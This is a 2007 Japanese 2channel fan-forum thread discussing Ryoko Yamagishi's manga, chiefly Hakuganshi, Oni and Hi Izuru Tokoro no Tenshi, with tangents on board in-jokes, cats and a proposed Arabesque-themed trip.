731 :花と名無しさん:2007/07/23(月) 22:32:53 ID:???0
ギシ漫画のどこに自分が惹かれたか考えてみたら
繊細でありつつ華美に走り過ぎない清潔かつ神経質、
そしてすこし気の抜けたとこのある絵と
きわどい内容だけど綺麗にまとまっている話
でありながらどこかほのぼのとしたところを持ってる不思議なところ。

結構きわどいストーリーが多いけどギシ先生自身はあんまり病んでる人っぽくないね。
病んでる人に関ったことはあるかも知れないけど。
あ王子の話は恋愛に全く興味がなかったころって自分でいってるだけあって
恋愛嫌いって感じでてるな。

732 :花と名無しさん:2007/07/23(月) 22:34:19 ID:???0
「いんだよ細けえことは」
「千花乙」
の意味がわかりません。由来は何ですか?

733 :花と名無しさん:2007/07/23(月) 22:42:13 ID:???0
私も知りたいノシ

734 :花と名無しさん:2007/07/23(月) 22:43:15 ID:???0
私もずっと疑問だった。

735 :花と名無しさん:2007/07/23(月) 22:44:44 ID:???0
私も疑問だった。

そしていつも同じ人が書いているのか、意味分かって書いているのかも知りたい。

736 :花と名無しさん:2007/07/23(月) 22:53:16 ID:???O
い(ry

737 :花と名無しさん:2007/07/23(月) 23:02:05 ID:???0
竹島どころじゃねーなw
オノコロで一気にモロボシ臭がw

738 :花と名無しさん:2007/07/23(月) 23:08:10 ID:???0
「いんだよ細けぇことは」ってセリフ自体は、
とある殺し屋漫画でキャラの一人が言ったものらしい。
「○○、恐ろしい子……(白目)」とか、「××こんな世の中じゃ」
「ポイズン」みたいな一種のお約束のやりとりらしいけど。

新スレ立ったときのチ○ポヘリみたいに、「最初は流れでウケたけど
面白かったのはその時だけだった」のを延々引きずるからなー、
このスレは。
正直邪魔なやりとりではある。

739 :花と名無しさん:2007/07/23(月) 23:13:01 ID:???0
>>738
それが何故千花に繋がるのか
これがわからない。

740 :花と名無しさん:2007/07/23(月) 23:14:05 ID:???0
2ちゃんねる漫画用語辞典にあったよ。ありがとう。

741 :花と名無しさん:2007/07/23(月) 23:20:27 ID:???0
>>739


742 :花と名無しさん:2007/07/23(月) 23:30:26 ID:???0
まぁそんなもんなんだとサラッと流す心の広さが必要なのかもしれない

743 :花と名無しさん:2007/07/23(月) 23:41:36 ID:???0
まあ使ってる人は楽しいんだろうね。チンポヘリみたいなもんで。

744 :花と名無しさん:2007/07/23(月) 23:43:18 ID:???0
この世の中なんて楽しんだ者勝ちだしね。

745 :花と名無しさん:2007/07/23(月) 23:57:56 ID:???0
>>742
自分語りと違って、ほぼ無害だしね。
むしろ理屈抜きっぽい分、ギスギスした流れを止めるには便利なのかも。

746 :花と名無しさん:2007/07/24(火) 00:12:48 ID:???0
白眼子で加代さんがパトロンの葬式に行ってたのが
ちょっとよく解かんなかった。どの面下げてと言うか何て説明して行ったんだろ?

747 :花と名無しさん:2007/07/24(火) 00:21:40 ID:???O
白眼子の代理として参列したんでしょう。
愛人関係より、白眼子との繋がりのほうが有名だったろうし。

748 :花と名無しさん:2007/07/24(火) 01:28:55 ID:???O
>>746
いんだよ細けえことは

749 :花と名無しさん:2007/07/24(火) 01:36:17 ID:???0
>>748
千花あんまり多用するとウザイだけだよ

750 :花と名無しさん:2007/07/24(火) 01:56:05 ID:???O
千花は細けぇことにこだわりそうな子だったから
少し楽にいい加減におなりという住民の願いも込められてるのではとか
考えたりなんかしてた

751 :花と名無しさん:2007/07/24(火) 01:58:21 ID:???0
しかし、住民の願いむなしく…

752 :花と名無しさん:2007/07/24(火) 02:09:23 ID:???0
嫌なことは寝て忘れる性格とは対極的な所にいる

753 :花と名無しさん:2007/07/24(火) 02:37:46 ID:???O
嫌なことを溜め込んでバネにするタイプってこわいね
バネどころか、奈落の底になりかねない

754 :花と名無しさん:2007/07/24(火) 02:48:28 ID:???0
言えてる

755 :花と名無しさん:2007/07/24(火) 05:35:30 ID:???0
関係ないけど、普段柔和な人が(静かに)怒ると怖い。
ポンポン怒りっぽい人は付き合いにくいけど、
小出しにエネルギー逃がしてるから、そんなには。
でも溜め込むタイプは・・・。
(うる星のランとおユキの関係)

756 :花と名無しさん:2007/07/24(火) 10:55:55 ID:???O
ポンポンは弁天
ランはちょっと違うな

757 :花と名無しさん:2007/07/24(火) 11:40:50 ID:???O
いんだよ

758 :花と名無しさん:2007/07/24(火) 13:21:37 ID:???0
>746 亀レス
あの当時はまだ妾業というか、お偉いさんには2号3号がいて当たり前だったんでは?
旦那が亡くなれば、堂々と取り分の権利を主張する。
でも、あの姉さんはそんなことしないタイプっぽい。
お世話になった人ってことで、純粋にお悔やみに行ったと思う。

759 :花と名無しさん:2007/07/24(火) 15:56:59 ID:???O
【速報】歴史ニュース【世界】
http://academy6.2ch.net/test/read.cgi/whis/1096899851/585


ハトシェプスト関連の続報ないのかなあ

760 :花と名無しさん:2007/07/24(火) 16:08:19 ID:???O
>>758
なんかそのへんこだわらずサラサラ描いてておもしろいよね。
お手伝いのお婆ちゃんもフツーでなんかよかった。
最後にシロさんが「姉さんには苦労かけた」的なこと言ってて
あのきょうだいも相当いろいろあったかも知れないけど
でも姉さんは苦労をさほど気にしてもいなさそうで
古い小説みたいでイイ

761 :755じゃないけど:2007/07/24(火) 16:39:24 ID:???0
>>756
ランはお雪の怒りが心底怖いんだよ。
弁天が怒ってても怖くはないんだよ。

762 :花と名無しさん:2007/07/24(火) 17:55:43 ID:???0
普段柔和な人が怒る時っていうのは、
それまでは内心腹が立つことがあっても、心の中で相手のことも弁護してみたり
我慢したりしてきて、
それでももうどうしょうもないくらい、相手に酌量の余地の無さを感じた時で
怒りの本気度が高いのだろうね。


763 :花と名無しさん:2007/07/24(火) 18:06:34 ID:???0
加代さんは最初は鬼のようにキツイ女性っぽかったのが、
情のある人っぽいのが見えてきて、
言い方はキツいんだけど情が出てるような所が面白い。
光子と再会してからは「大きくなって」という感じなのがまたよい。

764 :花と名無しさん:2007/07/24(火) 19:15:32 ID:???0
加代さんは人間ぽくてイイね。
シロさんが亡くなった後、加代さんと光子はまた昔のように
一緒に暮らしたのだろうか・・。

765 :花と名無しさん:2007/07/24(火) 20:29:10 ID:???0
>>758
確か、明治くらいまでは、「妾宅廻り」も本妻の仕事じゃなかったっけ?
妾の家に「いつも宅の主人がお世話になっております」という、ご挨拶をしておく
という・・・。しかも一品包んで。だから顔見知りでは?
大変な仕事だなぁ・・・昔の妻って。

766 :花と名無しさん:2007/07/24(火) 20:55:13 ID:???0
>>765
川原泉さんの「笑う大天使」で、主人公の一人の父親が
囲ってる愛人三人に、母親が中元歳暮渡してまわる、って
話があったね。

「いまどき('80年代だったか)アナクロにもほどがある風習だ」
って注釈がついてたけど。

767 :花と名無しさん:2007/07/24(火) 21:08:57 ID:???0
ママンの実家では、お妾さんが本宅に新年の挨拶に来たらしい。

768 :花と名無しさん:2007/07/24(火) 21:40:56 ID:???0
挨拶・付け届け。
なんか、妾は日陰者って気がしないですがすがしいな?
(そんなはずはないんだけど)

769 :花と名無しさん:2007/07/24(火) 21:57:24 ID:???0
日陰者だから正妻から付け届けを受ける立場なんじゃね?

770 :花と名無しさん:2007/07/24(火) 22:01:41 ID:9rJkHRNP0
え、違うと思う。
あなたがたは、私の管理下にあるんですよ、出すぎたまねはしないように、
ということをはっきりさせているだけだと思いますよ。

771 :花と名無しさん:2007/07/24(火) 22:03:34 ID:???0
アク禁解除テス。

772 :花と名無しさん:2007/07/24(火) 22:10:29 ID:???0
いんだよ細けえ事は

773 :769:2007/07/24(火) 22:10:59 ID:???0
>>770
あーそれそれ、そういうこともつもりで言ったんだけど、
確かに分かりにくい文章だったなぁ。

774 :花と名無しさん:2007/07/24(火) 22:12:23 ID:???0
>>772
千花、細かい事につっこむのは100レスに一度の割合にしとけ

775 :花と名無しさん:2007/07/24(火) 22:13:59 ID:???O
妾とは違うけど、売春が公営だったころの吉原の本に
旦那さんのなじみの店に「いつもどうもお世話になります」と
挨拶にくる奥さんは多かった、と書いてあったな。
昔のお金持ちはいろんな形でいろんな人の
面倒みてやるのが普通だったんだよね。

776 :花と名無しさん:2007/07/24(火) 22:28:56 ID:???0
>>774
いんだよ細けえ事は

777 :花と名無しさん:2007/07/24(火) 23:07:02 ID:???0
成功するといいね

778 :花と名無しさん:2007/07/25(水) 00:06:57 ID:???O
そうだね

779 :花と名無しさん:2007/07/25(水) 10:48:16 ID:???O
プロテインだね

780 :花と名無しさん:2007/07/25(水) 10:50:44 ID:???0
やっと白眼子読んだ
何度読んでも泣いてしまう・・・やっぱすごいなギシ先生

781 :花と名無しさん:2007/07/25(水) 11:25:53 ID:???0
私は「白眼子」ダメだ。
幸福と不幸の量は同じとか、なんだか胡散臭すぎる。
白眼子の性格は好きだが。

782 :花と名無しさん:2007/07/25(水) 11:31:18 ID:???0
自分もあのオカルト観が受け付けられない。

登場人物はみんな良くて読後感はいいんだけどね。

783 :花と名無しさん:2007/07/25(水) 11:55:20 ID:???O
白眼子は、ゆっくり読みたい作品だ。
よるべない貧しい少女と美青年が恋をする話かと思ったら全然違ったのを白状します。

784 :花と名無しさん:2007/07/25(水) 12:03:55 ID:???0
白さんはロリ

785 :花と名無しさん:2007/07/25(水) 12:08:17 ID:???0
白眼子が売れない小説家とかだったらよかったかも。
彼のファンタジーな作り話で、光子が癒されるとかだったら・・・。
(本当は見えないけど夫が見えるとか優しい嘘を言ったり、
嘘から出た真で両親が見つかるとか)

786 :花と名無しさん:2007/07/25(水) 12:08:57 ID:???O
白眼子は、偶然書店で見かけて単行本を買ったけど、
何かそれなりに衝撃的だったよ。
ギシ先生、こういうのも描くんだなーと。
読後感はすこぶる良かったし、ギシ漫画でこういう種類の泣きがくるとは思わなかった。
幸と不幸は同量…てのは、確かに微妙だけどシロさん、光子、カヨさんの関係性が好きだなー。

787 :花と名無しさん:2007/07/25(水) 12:37:14 ID:???0
大きくなってもちっとも綺麗にならないヒロインが
イケメンに普通に愛されちゃう展開も自然だったし

クミ、希望は捨てるな

788 :花と名無しさん:2007/07/25(水) 12:41:06 ID:???0
空美の恋愛なんて想像つかんw
バレエが恋人って事でw

789 :花と名無しさん:2007/07/25(水) 12:42:57 ID:???O
>>786 
分かる。私は色々な本を読んだ中でああいう感情で泣いた事が初めてだったよ。
ギシ作品は読む時のその人の状態によって感じ方が違うね。
子供の頃読んだ鬼をこの前見返したら号泣した。

790 :花と名無しさん:2007/07/25(水) 12:54:59 ID:???O
>>789
うっ鬼…そろそろ勇気出して再読する頃かなあ
当時、近所にあった(今は潰れた)貸本屋で借りたものの恐ろしくて一回しか読まずに返したし。
しかも、図書館に置いてあるんだなー
季節柄にもいいかもしれん。確か大学生たちのサークルの夏合宿みたいだったよね
最近読んだ本に「鬼」は「許し」がテーマとかあったし、
みんなの感想を見る限りでは怖い怖いだけの話じゃない、というのは分かってるんだけど…

791 :花と名無しさん:2007/07/25(水) 13:09:26 ID:???0
「鬼」は素麺と天麩羅がうまそうで、嫌いじゃないw

792 :花と名無しさん:2007/07/25(水) 15:51:51 ID:???O
ハリッハリのてんぷら〜と素麺
季節的にも今ぴったりだね

白眼子はカヨさんも、「アンタ何人?」なイトコもいい
実はぬこが一番恋しかったりする光子もいい

793 :花と名無しさん:2007/07/25(水) 16:54:54 ID:???O
鬼はグロ描写が少しだけあるし、怖いというより欝な感じだけど、最後はちゃんと救いがあるから読後感は悪くない。

あと天麩羅が食いたくなる。

794 :花と名無しさん:2007/07/25(水) 17:26:17 ID:???O
>>792
ギシ先生ぬこ好きだよなw

795 :花と名無しさん:2007/07/25(水) 17:36:30 ID:???0
×ぬこ
○猫


蛭子であんな可愛い猫をあんなに残酷に殺すなんて……
ギシ、恐ろしい子!w

796 :花と名無しさん:2007/07/25(水) 17:44:38 ID:???0
>>795
ぬこの件、釣り?

797 :花と名無しさん:2007/07/25(水) 17:45:36 ID:???0
ぬこって言う奴きら〜い

798 :花と名無しさん:2007/07/25(水) 17:47:15 ID:???O
ケイトの話は泣けた

799 :花と名無しさん:2007/07/25(水) 17:48:29 ID:???0
2ちゃん語にマジレスすんのもなんだけど
自分もあんまり…
ぬことかぞぬとかってキモイよねw

まあそういうのはスルーが吉

800 :花と名無しさん:2007/07/25(水) 17:52:17 ID:???0
   / ̄ ̄ ̄ ̄ ̄\
  /           \
 /       ( ●)   |
 | |(● )   ‐-‐ |  |
 | |-‐     | |_/
 \/ /   _/ |
    |_● ̄  | /
      |/ ̄|/
       \_/



801 :花と名無しさん:2007/07/25(水) 17:59:05 ID:???O
統計取りたいほど、猫飼いの女性マンガ家は多いように思う。
生活スタイルに合うんだろうけど、結構大物や仕事が順調な人にも多い感じだし、
猫パワーとかあんのかな、と考えてしまったくらい。
猫買ったことないけど、猫マンガや猫エッセイ(大ざっぱにまとめすぎたかな)て、面白い。

802 :花と名無しさん:2007/07/25(水) 18:00:00 ID:P14QPHrm0
犬は散歩がめんどいので漫画家には向かない。

803 :花と名無しさん:2007/07/25(水) 18:02:06 ID:???O
ケイトちゃんってヒズテンにも出てたんだっけ?

804 :花と名無しさん:2007/07/25(水) 18:03:06 ID:???0
出てた場面は覚えてないけど、死んだ猫が帰ってきた話で
そんなふうに言ってたような。

805 :花と名無しさん:2007/07/25(水) 18:14:36 ID:???O
>>803
馬子の膝の上にいた気がする。

806 :花と名無しさん:2007/07/25(水) 18:49:20 ID:???0
>>779
ワロタw

807 :花と名無しさん:2007/07/25(水) 19:01:31 ID:???0
>>803
どのシーンとは覚えてないけど、ちょこちょこ見かけたような気もする
だいたいは室内の人物が座ってるシーンのような気がする



808 :花と名無しさん:2007/07/25(水) 19:12:26 ID:???0
そういえば、久しぶりにところてん読み返したら
なんつーか腐女子っぷりにちょっと引いたよ


809 :花と名無しさん:2007/07/25(水) 19:16:23 ID:???0
「白眼子」は作家としての可能性を広げた、という印象がしたな。
山岸先生の衝撃かつ戦慄の作品群は魅力的だが、それをぐっと押さえて、あえ
てああいう話にしたように思う。だからカヨさんの性格は、途中で「口はきつ
いけど暖かな人」になったんではないかな?
昔はハッピーエンドも照れがあったように思うが、淡々と「辛いこともあるけ
れど普通の、幸せな人生」を描けるようになった、ということだと思う。


810 :花と名無しさん:2007/07/25(水) 19:24:00 ID:???O
>>808
まぁでもあれはやおいの一言では片付けられない深い作品だと思う。


811 :花と名無しさん:2007/07/25(水) 19:32:11 ID:???O
>>810
ほう

812 :花と名無しさん:2007/07/25(水) 19:36:30 ID:???O
つか話が重すぎて腐女子くささは感じん

813 :花と名無しさん:2007/07/25(水) 19:45:09 ID:???0
腐女子はところてん大好きですけどね

814 :花と名無しさん:2007/07/25(水) 19:48:43 ID:???O
青青の時代が好き。
穏やかな気持ちになれる。

815 :花と名無しさん:2007/07/25(水) 20:04:02 ID:???O
ある意味腐女子が一度は通る漫画ではあると思うけどね。風と木の歌とか。


でも処天が801くさいは言い過ぎ。

816 :花と名無しさん:2007/07/25(水) 20:09:22 ID:???O
>>815
そうだね。でも何か尊すぎて妄想のネタにできない感じたろうね。
同性愛がテーマじゃないし。

817 :花と名無しさん:2007/07/25(水) 20:12:11 ID:???0
高校のとき、日本史の教師(サッカー部の顧問)が授業中、ところてんを薦めてたなあ
わざわざコミックスを教室に持ってきてね

818 :花と名無しさん:2007/07/25(水) 20:13:29 ID:???O
>>817
私は真剣ゼミの付録のおすすめ漫画記事で知ったよ。

819 :花と名無しさん:2007/07/25(水) 20:18:47 ID:???O
処天は、腐女子が必ず一度は読む漫画かもしれないけど、
かといって読者=腐女子ではないよね。
不覚にもギシ漫画好きの割に読んだのは2年ほど前だけど、
別にやおいやらBLにハマる気配はないぞよ

820 :花と名無しさん:2007/07/25(水) 20:22:29 ID:???O
>>819
私は高校の時に、うちの物置小屋から発掘して読んだけど、同性愛についてはぴんとこなかったな。びっくりはしたけど。

つか腐女子腐女子うるさいのは同じ人?

821 :花と名無しさん:2007/07/25(水) 20:40:17 ID:???O
別に誰も読者の全てが腐女子だとは言ってないんじゃない?よくわからないけど。


てか>>816の言うとおり誰しも通る道ではあるけど、その妄想の対象にはなりにくいよ。
ズバリ同性愛的な表現があると妄想の入り込む余地がないというか。
むしろ同時代の少女漫画だったらバナナフィッシュの方が同人的には人気あったよ。

822 :花と名無しさん:2007/07/25(水) 20:41:55 ID:???0
>>820
腐女子って言葉使えば荒れると思ってる人がいるんじゃない?

そういや山岸さんが処天文庫のあとがきで言ってたね
「自分には同性愛を描く理由がある
同性愛の漫画を読んで(影響されて)
そういう作品を描く人とはやっぱり違う」みたいなこと

今って男の同性愛描けば何でも腐女子扱いなんだろうが
切実にそういうテーマに取り組んだ時代もあったってことだ

823 :花と名無しさん:2007/07/25(水) 20:43:48 ID:???O
>>821
あれはあれで完結してるからね。悲しい形で…。 
でもふたりに幸せになってほしいとは思ったりする。

824 :花と名無しさん:2007/07/25(水) 21:04:11 ID:???0
『青青の時代』の最後のほうで日女子が歯数および噛み合わせが顔の老化と深く関係する、と
述懐していたけど、このことを自身もしくはお子さんに強く言い聞かせた読者氏はいるのかしら。

825 :花と名無しさん:2007/07/25(水) 21:04:45 ID:???0
ハリポタにコブラ出てきただけで笑えてくる

826 :花と名無しさん:2007/07/25(水) 21:07:30 ID:???0
レズの話はなんか中途半端に悲劇だったよね。白い部屋の二人だっけ。


827 :花と名無しさん:2007/07/25(水) 21:15:13 ID:???O
>>822
なんで王子を同性愛者にしたんだろうね、そういえば。
まあそのおかげで悲しくも深い話になったけど。

828 :花と名無しさん:2007/07/25(水) 21:23:40 ID:???0
トコロテン、別に同性愛ものだとは意識しなかったけれど、
なんというか色々な意味で「悲恋モノ」かなぁ?とは思って
いたけれど。

変な表現だけど仏像は両性具有っぽいな…っていう感じかな。

829 :花と名無しさん:2007/07/25(水) 22:07:19 ID:???0
白眼子や鬼は、過去の作品とくらべて観念的っていうか、
言葉でくどくど説明しすぎな気はする。
でも一時期不調で、それを抜け出した後の作品みたいに言ってたから
仕方ない気もする。

830 :花と名無しさん:2007/07/25(水) 22:42:43 ID:???0
カヨも白眼子も、幼少は裕福な家の子だったのだろうな、と思う。
おっとりな白眼子はさもありなんだし、
カヨのキツさは、我慢のしない暮らしが当然だったから、守られていたから、と想像する。
年を経て苦労を経験をするようになって、優しくなっていった気がする。

831 :花と名無しさん:2007/07/25(水) 22:47:26 ID:???O
王子が同性愛者という感覚が意外にもなかったな
毛人に恋愛感情抱いてたけど、淡水にやられてたけど。
でもギシ先生も同性愛者として捉えてたてことか
何か同性愛者の定義て難しいね

832 :花と名無しさん:2007/07/25(水) 22:52:07 ID:???0
>>829
白眼子は特殊な人たちってカンジで苦手だけど、鬼は昔話的で好きだなぁ。
思うにあの雰囲気は、掲載誌のカラーに合わせたのではと。
>>827
男女だと読者が女に嫉妬するから、って何かで読んだ気がしたなぁ。
厩戸王子がノンケだったら、毛人じゃなくて刀自古と暑苦しい情念が展開したのか?
でもあの時代は、女性は政治に参加できないから毛人で当然なのかもね。

833 :花と名無しさん:2007/07/25(水) 22:57:21 ID:???0
散々ループの話題だとは思うが王子が母親からの愛情を受けて育ってたらね
毛人には惹かれるかもしれないがあんな極端な女嫌いにはならなかった筈

834 :花と名無しさん:2007/07/25(水) 22:59:01 ID:???0
>>831
王子の同性愛は積極的なチョイスではなくて、
母親への愛憎ゆえの女性否定だから、病的な気がする。
(子作りできるんだから、ノンケになる可能性があった)
第一、毛人とは恋愛と言うより母の愛情の補償に近い。

835 :花と名無しさん:2007/07/25(水) 22:59:16 ID:???0
>>783
私は目からビーム!みたいな美少年が主人公の話かな?
とイメージしてました

836 :花と名無しさん:2007/07/25(水) 23:03:01 ID:???0
デジコかにょ?

837 :花と名無しさん:2007/07/25(水) 23:08:33 ID:???O
>>834
実際の同性愛もあんまり積極的になった人はいないんじゃないかな?
理由は一概には言えないと思うけど。

838 :花と名無しさん:2007/07/25(水) 23:09:34 ID:???O
>>834 
だから余計切ないんだよな。えみしじゃなきゃ駄目だから。
積極的な同性愛なら、これからいい人が見つかることもあるけど

839 :花と名無しさん:2007/07/25(水) 23:10:31 ID:???0
>>836
目を見たら呪われる系のイメージ

840 :花と名無しさん:2007/07/25(水) 23:12:07 ID:???O
>>815
風と木は、ジルベールみたいな○○とか、普通のエッセイとかでも見る表現だし、
読んどいて損はないように思う。何となく…w
あと自分が知ってる同性愛漫画は、「TOMOI」とか、同性愛じゃないけど、
エッセンスがあるのは、「BANANA FISH」とかなんだけど、よく考えたら少コミ、今の性コミ…
何か昔は作品として、深くて読ませるものがあったのに
何で今みたいなことになったんだろ…てオモタよ
性コミさすがに読んでなく、ブクオフで立ち読みならぬ立ち見した程度だけど
今、中学生くらいで漫画読んでる子て何かかわいそうだ

841 :花と名無しさん:2007/07/25(水) 23:22:24 ID:???0
>>834
母親からの愛情の補填はむしろあの池沼の少女では?
結局あの娘とは子供までつくる訳だし

毛人への恋慕であり執着は
自分の生への肯定感が欲しかったんだと思った
だから最後に毛人に「あなたが愛してるのは自分」
という本質見抜かれたんじゃないかと

842 :花と名無しさん:2007/07/25(水) 23:24:02 ID:???0
>>840
tomoiは山岸漫画と同じくらい救いなかったね。救いなさすぎだよ。
人物のキャラもクールで、あのワクニの漫画の中では唯一、自分の中で高評価。

843 :花と名無しさん:2007/07/25(水) 23:24:57 ID:???0
>>841
王子は自分を忌み嫌ってると思う
しかしよくあの少女相手にたったな

844 :花と名無しさん:2007/07/25(水) 23:36:03 ID:???0
>>841
美郎女との結びつきは毛人と分かれた後だから。
身分の低い白痴女であるから、毛人以上に都合よく扱える。
母との共通要素として、毛人は超能力、美郎女は面差しがある。
自分の生への肯定感は政治に関わることで、あるのでは?
毛人に求めているのは、母からは与えられることのなかった存在の肯定、
包容力だと自分は思う。

845 :花と名無しさん:2007/07/25(水) 23:40:46 ID:???0
>>843
むしろ知能的にアレで、自意識らしいものがほとんどない相手だったから可能だったのかも。
人として普通に反応を返してくる相手とはダメだったんじゃないかなー。

毛人とあんなことやこんなこと…のシーンも、なんつーか夢に侵入して相手を自分の思い通りに
操っての結果だったような気がする(毛人に「抱かれた」というよりは「抱かせた」みたいな)。
王子本人に自覚があってのことかどうかはわからないけど、結局「全部俺のターン!」でないと
思い通りにふるまえない人なんだろうなーと思う。

846 :花と名無しさん:2007/07/25(水) 23:41:40 ID:???0
トジコは百歩譲ってもやり過ぎだろ常考

847 :花と名無しさん:2007/07/25(水) 23:44:24 ID:???O
トジコ「いんだよ略」

848 :ずっと俺のターン!:2007/07/25(水) 23:50:09 ID:???0
美郎女は一方的に扱えるお人形に近いと思う。
対等に愛情を応酬できる相手にならない。

849 :花と名無しさん:2007/07/25(水) 23:51:40 ID:???O
>>848
なんだその名前欄は

850 :花と名無しさん:2007/07/26(木) 00:12:41 ID:???0
>>849
えっと、「遊戯王」ってアニメで、
カードの効果で、永続的に相手を攻撃できる伝説の回がありまして、
一方的にボコる状態を、ちゃねらは「ずっと俺のターン!」と呼んでおりますw

851 :花と名無しさん:2007/07/26(木) 00:56:18 ID:???O
>>850
それは知っているがなんだと問うている!

852 :花と名無しさん:2007/07/26(木) 01:01:31 ID:???O
で 出おったわ

853 :花と名無しさん:2007/07/26(木) 01:06:57 ID:???O
ネタバレマダー?

854 :花と名無しさん:2007/07/26(木) 01:20:20 ID:???O
王子は性的倒錯者てことでいいのかな
何でも母親の愛情不足のせいにしちゃいかんとは思うけど、
こればかりは母親が要因て断定できる感じ

855 :花と名無しさん:2007/07/26(木) 01:22:59 ID:???0
王子と一緒の墓に入りたくないって・・・毛人が王子を代弁して言った
必死の訴えも全く間人には通じなかったってことだよね


856 :花と名無しさん:2007/07/26(木) 01:45:51 ID:???O
仏の生まれ変わりっぽいから、もしかしたら両性具有的な素質はあったのかもよ。
母親の愛があれば女も好きになれたかもしれないけど、たとえそうでも男も好きだったかも。
真性ホモじゃなくてバイになってたかもって事だけど。

いやなんとなく母親からの逃避でホモになったのならちょっと可哀想過ぎて。

857 :花と名無しさん:2007/07/26(木) 03:29:45 ID:AWtyCdyi0
鬼、押入、白眼子は読んだ事ないや

古本屋に売ってたら買うんだけどなあ

858 :花と名無しさん:2007/07/26(木) 03:36:13 ID:???0
性的倒錯者というより、自分はナルシストというイメージだったなあ。
自分しか愛せないから、自らの分身にあたるモノとしてのエミシを欲し、
拒否されてから、ナルシスにとってのの水面」にあたるモノとして
美郎女を見出した。

859 :花と名無しさん:2007/07/26(木) 03:43:52 ID:???O
ペシミストだよ。
自分のことが好きなわけでも、人生楽しんでるわけでもないと思う。

860 :花と名無しさん:2007/07/26(木) 04:44:44 ID:???0
>性的倒錯者
たんに、自分の容姿が女性的なのを利用してるんだと思った。

861 :花と名無しさん:2007/07/26(木) 06:52:09 ID:???0
アナホべにやられてたらどうなってたろう。

862 :花と名無しさん:2007/07/26(木) 06:53:52 ID:???0
どうにもならない。どの道、穴穂部は殺される。

863 :花と名無しさん:2007/07/26(木) 08:28:17 ID:???0
穴掘るべ

864 :花と名無しさん:2007/07/26(木) 09:16:41 ID:???O
>>858
ナルシストというより自分大嫌いって感じだと思った。

865 :花と名無しさん:2007/07/26(木) 09:32:45 ID:???P
自分大好きでしょw

866 :花と名無しさん:2007/07/26(木) 09:34:20 ID:???0
自己愛と自己嫌悪って表裏一体だしね。

867 :花と名無しさん:2007/07/26(木) 10:21:47 ID:???0
自分嫌いの反動か、でも他人はもっと嫌いなんだよな、
ってカンジ。

868 :花と名無しさん:2007/07/26(木) 10:45:10 ID:???O
自己愛とエゴイズムは似てるようでまるきり違うよ〜

869 :花と名無しさん:2007/07/26(木) 10:54:28 ID:???0
自己愛が傷ついてるんだろなオージ
ちゃんと身につけられなかったというか
言うまでもなく母から愛されな買ったからだと思うけど

870 :花と名無しさん:2007/07/26(木) 11:03:40 ID:???O
うん、だからナルシストとはちょっと違うかなと。

871 :花と名無しさん:2007/07/26(木) 12:27:03 ID:OenpgEz4O
そこらへん毛人と王子のお互いの書に対する評価にあらわれてるな
王子は自分の字が嫌いで毛人のが好き
毛人は自分の字を卑下せず王子の字を褒める

872 :花と名無しさん:2007/07/26(木) 12:29:03 ID:OenpgEz4O
ちゃんとした自己愛が育めたか否かの差だ

873 :花と名無しさん:2007/07/26(木) 12:41:11 ID:???O
毛は家族に愛されまくってるよなー。
よく考えなくても羨ましい奴だが、王子に人生ひっかき回されたな。
あ、妹もか……。

874 :花と名無しさん:2007/07/26(木) 13:13:27 ID:???O
>>857
そこらへんはけっこう古本屋で見かけるけど、潮出版社希望コミックスとか講談社amiコミックスとか、
マイナーな出版社やコミックスで、装丁が統一されてないから探しにくいんだよね

875 :花と名無しさん:2007/07/26(木) 13:45:53 ID:???O
大姫が結構好きだった。ツンデレで可愛いとこあるし。

876 :花と名無しさん:2007/07/26(木) 14:15:44 ID:???O
>>875
つ広告の裏

あんたいろんなとこで同じこと言ってるね
しかも突然

877 :花と名無しさん:2007/07/26(木) 14:24:19 ID:???0
なぜそんなにつっかかってるのかわからない。
スレ違いでもないし、ここに書いてもいいと思うけど。
特定の一人だと思い込むほど特殊な意見でもなし。

878 :花と名無しさん:2007/07/26(木) 14:43:29 ID:???O
>>877
スレが自分の思う通りの流れじゃないと嫌なんでしょ。


879 :花と名無しさん:2007/07/26(木) 14:44:50 ID:???O
>>876
シロさん好き。あの静謐な感じが素敵。

アラベスク読んでたら、涼しそうだし、ロシア行きたくなった。
ハルギツの時計工場見学も含めた、アラベスクツアーとか私が旅行代理店勤務なら、
一度は提案出してみるんだけど…
本物のソ連時代に行って無愛想な店員のいるデパートとか少し行ってみたかったなー。

880 :花と名無しさん:2007/07/26(木) 14:48:07 ID:???O
一人突っ掛かる奴がいると雰囲気悪くなるね。

881 :花と名無しさん:2007/07/26(木) 15:02:02 ID:???0
>>875
貝蛸ちゃん可愛いよね。
今で言うとツンデレで全部片付いちゃうけど、
いかにも一昔前の少女漫画の主人公タイプだね。
それこそ一昔前だったらひとり幸せになったんだろうけど……。

882 :花と名無しさん:2007/07/26(木) 15:06:52 ID:???O
>>871
そのあたりにも性格出てるね
いいエピだ

883 :花と名無しさん:2007/07/26(木) 15:17:26 ID:???O
>>881 
菊見の宴で、折角身内だけで楽しもうと思ったのに…とか言いつつお洒落してる様が可愛かった。

884 :花と名無しさん:2007/07/26(木) 15:24:46 ID:???O
何度読んでも毛の裏切りが許せない。処女でなくてはいけないあの女は淫乱だし。あの女のせいで毛は王子を捨てた。淫乱最悪。王子カワイソス。心狭い私
あと。短編も面白いけど、テレプシは再開マダー?

885 :花と名無しさん:2007/07/26(木) 15:26:03 ID:???0
まだ

886 :花と名無しさん:2007/07/26(木) 15:29:31 ID:???O
短編じゃなくなってるのは、話が広がっって収拾つかなくなってるからかなー?春だけって言ってたのに
テレプシ早く再開してほしーい

887 :花と名無しさん:2007/07/26(木) 15:38:53 ID:???0
テレ厨自重

888 :花と名無しさん:2007/07/26(木) 16:22:22 ID:???O
>>879
ごめん、ハルギツは別に行きたくないわ
アラベスクツアーで外せないのは、パリとモスクワとあとどこだ?

889 :花と名無しさん:2007/07/26(木) 16:32:43 ID:???O
>>888
そりゃレニングラードは外せんね
むしろモスクワより

890 :花と名無しさん:2007/07/26(木) 16:51:36 ID:???0
キエフ

891 :花と名無しさん:2007/07/26(木) 17:08:55 ID:???0
・チャイカでビーフシチュー
・ミロノフ先生の車(後部座席)

892 :花と名無しさん:2007/07/26(木) 17:10:18 ID:???O
法隆寺

893 :花と名無しさん:2007/07/26(木) 17:33:48 ID:???O
摩周湖

894 :花と名無しさん:2007/07/26(木) 18:38:03 ID:???0
ノンナがお掃除して、最後には踊った地方の劇場。

895 :花と名無しさん:2007/07/26(木) 18:54:37 ID:???0
チョーシにノンナ

896 :花と名無しさん:2007/07/26(木) 19:35:27 ID:???O
>>895
なつかしい

897 :花と名無しさん:2007/07/26(木) 20:25:02 ID:???O
>>879
けっこう前のスレで、ハルギツがどこにあるかわからないって話題になったよね。
